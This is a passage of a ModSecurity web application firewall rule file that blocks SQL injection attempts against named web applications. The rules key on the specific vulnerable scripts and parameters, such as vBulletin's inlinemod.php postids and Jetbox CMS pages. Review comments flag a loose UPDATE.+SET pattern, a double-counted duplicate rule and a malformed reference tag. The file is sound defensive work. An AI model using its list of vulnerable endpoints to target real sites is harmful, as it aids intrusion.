    SecRule &TX:'/SQL_INJECTION.*ARGS:mealid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- meal_rest.asp mealid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- res_details.asp resid UPDATE
SecRule REQUEST_LINE "@contains /res_details.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006879,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- res_details.asp resid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451970/100/200/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:resid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- res_details.asp resid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE
SecRule REQUEST_LINE "@contains /classes/class_session.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004802,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2010'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:CLIENT_IP/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006674) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- post.php img UPDATE
SecRule REQUEST_LINE "@contains /forum/modules/gallery/post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006674,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- post.php img UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453468/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:img/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- post.php img UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- index.php img UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006680,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- index.php img UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453468/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:img/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Gallery SQL Injection Attempt -- index.php img UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Community Blog Mod SQL Injection Attempt -- entry_reply_entry.php eid UPDATE
SecRule REQUEST_LINE "@contains /lib/entry_reply_entry.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006686,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Community Blog Mod SQL Injection Attempt -- entry_reply_entry.php eid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453159/100/100/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:eid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Community Blog Mod SQL Injection Attempt -- entry_reply_entry.php eid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006212) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ixprim SQL Injection Attempt -- ixm_ixpnews.php story_id UPDATE
SecRule REQUEST_LINE "@contains /ixm_ixpnews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006212,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ixprim SQL Injection Attempt -- ixm_ixpnews.php story_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21710'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:story_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS Ixprim SQL Injection Attempt -- ixm_ixpnews.php story_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005347) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE SecRule REQUEST_LINE "@contains /auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005347,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25587'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005365) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php user UPDATE SecRule REQUEST_LINE "@contains /auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005365,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php user UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25587'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # 
(2005371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE SecRule REQUEST_LINE "@contains /auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005371,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25587'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp title UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004157,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp title UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0940'" SecRule &TX:'/SQL_INJECTION.*ARGS:title/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp title UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004342) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp author UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004342,rev:5,msg:'SLR: ET 
WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp author UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3470'" SecRule &TX:'/SQL_INJECTION.*ARGS:author/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp author UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE SecRule REQUEST_LINE "@contains /G_Display.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004485,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24253'" SecRule &TX:'/SQL_INJECTION.*ARGS:iCategoryUnq/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004491) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE SecRule REQUEST_LINE "@contains /Search/DisplayResults.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004491,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24253'" SecRule &TX:'/SQL_INJECTION.*ARGS:iSearchID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006497) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- login.php login_username UPDATE SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006497,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- login.php login_username UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4081'" SecRule &TX:'/SQL_INJECTION.*ARGS:login_username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- login.php login_username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006503) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- news.php item UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006503,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- news.php item UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4081'" SecRule &TX:'/SQL_INJECTION.*ARGS:item/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- news.php item UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004082) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE SecRule REQUEST_LINE "@contains /admincp/attachment.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004082,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',tag:'web-application-attack',tag:'url,www.vbulletin.com/forum/project.php?issueid=21615'"
# Chained link for 2004082: when the pattern matches the query string or body,
# tx.anomaly_score is raised by tx.critical_anomaly_score and the matched value
# is stored under a tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<variable name> key.
# NOTE(review): (?i:UPDATE.+SET) has no word boundaries, so any text in which
# "update" is later followed by "set" (for example "updated ... reset")
# satisfies it; on this path ordinary form content can earn a critical score.
# NOTE(review): this link declares no t: actions of its own. Confirm which
# transformations it actually runs with in the deployment, so that encoded
# spellings of the keywords are normalised before the match.
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004151) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE
# NOTE(review): same two match conditions as rule 2004082 (request line
# contains /admincp/attachment.php, then (?i:UPDATE.+SET)); only id, rev and
# the reference tag differ. A request that satisfies one satisfies both, so
# tx.anomaly_score is raised by tx.critical_anomaly_score twice for a single
# event. Confirm the double count is intended, or merge the two references
# into one rule.
SecRule REQUEST_LINE "@contains /admincp/attachment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004151,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24503'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004671) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- inlinemod.php postids UPDATE
# Chain starter: the request line must contain /inlinemod.php; the chained link
# that follows counts TX variables whose name matches SQL_INJECTION.*ARGS:postids.
SecRule REQUEST_LINE "@contains /inlinemod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004671,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- inlinemod.php postids UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3387'"
SecRule
&TX:'/SQL_INJECTION.*ARGS:postids/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- inlinemod.php postids UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003944) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- main_page.php UPDATE SecRule REQUEST_LINE "@contains /main_page.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003944,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- main_page.php UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- main_page.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- open_tree.php UPDATE SecRule REQUEST_LINE "@contains /open_tree.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003950,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- open_tree.php UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- open_tree.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003956) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- 
outputs.php UPDATE SecRule REQUEST_LINE "@contains /outputs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003956,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- outputs.php UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- outputs.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php view UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003962,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php view UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule &TX:'/SQL_INJECTION.*ARGS:view/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php view UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- opentree.php id UPDATE SecRule REQUEST_LINE "@contains /admin/cms/opentree.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003968,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- opentree.php id UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule REQUEST_LINE "@contains id[" "chain" SecRule 
QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- opentree.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003974) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php login UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003974,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php login UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0028'" SecRule &TX:'/SQL_INJECTION.*ARGS:login/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php login UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007349) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JiRos FAQ Manager SQL Injection Attempt -- index.asp tID UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007349,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JiRos FAQ Manager SQL Injection Attempt -- index.asp tID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2836'" SecRule &TX:'/SQL_INJECTION.*ARGS:tID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JiRos FAQ Manager SQL Injection Attempt -- index.asp tID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007355) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- 
openlink.asp LinkID UPDATE
# Chain starter: the request line must contain /openlink.asp. The chained link
# then requires at least one TX variable whose name matches
# SQL_INJECTION.*ARGS:LinkID before raising tx.anomaly_score by
# tx.critical_anomaly_score.
# NOTE(review): the reference tag reads 'url,www.securityfocus.com/bid/2.2.8'.
# "2.2.8" has the form of a release version, not a numeric Bugtraq ID, so it
# looks as if a version-string substitution overwrote the original identifier.
# Restore the BID from the upstream signature; as written the tag cannot be
# followed during alert triage.
SecRule REQUEST_LINE "@contains /openlink.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007355,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- openlink.asp LinkID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'"
SecRule &TX:'/SQL_INJECTION.*ARGS:LinkID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- openlink.asp LinkID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007361) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- viewlinks.asp CategoryID UPDATE
# Chain starter: the request line must contain /viewlinks.asp; the chained link
# counts TX variables whose name matches SQL_INJECTION.*ARGS:CategoryID.
# NOTE(review): this rule carries the same malformed reference tag,
# 'url,www.securityfocus.com/bid/2.2.8'; restore the numeric Bugtraq ID here
# as well.
SecRule REQUEST_LINE "@contains /viewlinks.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007361,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- viewlinks.asp CategoryID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'"
SecRule &TX:'/SQL_INJECTION.*ARGS:CategoryID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- viewlinks.asp CategoryID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004378) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE
# Chain starter: the request line must contain /search.php.
SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004378,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary
UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3455/'" SecRule &TX:'/SQL_INJECTION.*ARGS:salary/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003763) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS John Mordo Jobs SQL Injection Attempt -- index.php cid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003763,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS John Mordo Jobs SQL Injection Attempt -- index.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3672'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS John Mordo Jobs SQL Injection 